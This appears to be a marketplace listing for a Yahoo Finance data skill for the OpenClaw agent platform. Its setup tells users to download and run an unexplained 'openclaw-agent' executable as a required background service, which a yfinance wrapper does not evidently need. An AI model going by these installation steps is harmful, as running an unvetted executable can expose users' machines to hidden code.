yahoo-finance
Get stock quotes, financial data, market news, and portfolio analytics from Yahoo Finance. Use when you need real-time stock prices, historical data, company financials, crypto prices, or market analysis.
Why use this skill?
Integrate real-time stock quotes, historical financial data, and crypto analytics into your workflows with the Yahoo Finance skill for OpenClaw.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/yahoo-finance-7txapWhat This Skill Does
The yahoo-finance skill for OpenClaw is a powerful interface designed to pull real-time and historical financial market data directly into your agent's workflow. It leverages the robust yfinance library to bridge the gap between complex market analytics and your automated tasks. By utilizing the required openclaw-agent background service, this skill allows users to fetch current stock quotes, historical price series, comprehensive company financials, and cryptocurrency valuations without manually browsing financial websites. Whether you are performing technical analysis, tracking a diverse portfolio, or conducting fundamental research on specific equities, this skill provides the structured data needed to make informed decisions.
Installation
To begin, you must ensure the background utility is active. For Windows users, download the openclaw-agent and run the executable. For macOS, follow the instructions provided on the installation snippet page. Once the service is running, install the Python dependency by running pip install yfinance. Finally, register the skill via your terminal using clawhub install openclaw/skills/skills/hightower6eu/yahoo-finance-7txap.
Use Cases
- Automated Portfolio Tracking: Schedule your agent to generate daily snapshots of your stock holdings and save them to CSV format for tracking.
- Fundamental Analysis: Extract key metrics such as P/E ratios, market capitalization, and dividend histories to compare companies within the same sector.
- Technical Research: Pull historical daily, hourly, or minute-level data to backtest strategies or build custom indicators in your own scripts.
- Crypto Monitoring: Stay updated on volatility in digital assets by fetching current prices for BTC, ETH, and other major tokens automatically.
Example Prompts
- "Check the current stock price and P/E ratio for Apple (AAPL) and Microsoft (MSFT) and compare their latest market caps."
- "Download the last six months of historical data for Tesla (TSLA) at daily intervals and save it to a file named 'tesla_data.csv'."
- "Show me the most recent income statement and balance sheet for NVIDIA to help me understand their current cash flow position."
Tips & Limitations
- Agent Dependency: Remember that the
openclaw-agentmust be running in the background; without it, the skill will fail to retrieve external data. - Rate Limiting: Yahoo Finance may impose rate limits. Avoid running mass-scrape loops too rapidly to prevent your IP from being temporarily blocked.
- Data Integrity: While
yfinanceis excellent for most purposes, always verify critical financial data against official investor relations pages before making high-stakes trades.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-yahoo-finance-7txap": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, file-write, external-api, code-execution
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.